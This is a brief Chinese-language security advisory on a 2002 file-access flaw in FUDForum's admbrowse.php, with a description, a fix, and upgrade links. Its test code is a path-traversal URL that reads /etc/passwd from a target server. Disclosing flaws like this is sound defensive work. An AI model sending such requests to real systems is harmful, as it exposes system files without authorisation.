Ilia Alshanetsky FUDForum存在文件可操作漏洞发布时间:2002-08-28 更新时间:2002-08-28 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5502 受影响系统 Ilia Alshanetsky FUDForum 1.2.8详细描述 Ilia Alshanetsky FUDForum是基于WEB的论坛程序。 adm/admbrowse.php脚本允许下载和建立删除FUDforum目录之外的文件。 测试代码 http://目标.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid] 解决方案 升级程序: Ilia Alshanetsky FUDForum 1.2.8: Ilia Alshanetsky Upgrade FUDforum2_20020712.tar.gz http://fud.prohost.org/download/FUDforum2_20020712.tar.gz Ilia Alshanetsky FUDForum 1.9.8: Ilia Alshanetsky Upgrade FUDforum2_20020712.tar.gz http://fud.prohost.org/download/FUDforum2_20020712.tar.gz Ilia Alshanetsky FUDForum 2.0.2: Ilia Alshanetsky Upgrade FUDforum2_20020712.tar.gz http://fud.prohost.org/download/FUDforum2_20020712.tar.gz 相关信息 Ulf Harnhammar <ulfh@update.uu.se>. 参考:http://online.securityfocus.com/archive/1/288042 相关主页:http://fud.prohost.org/ |
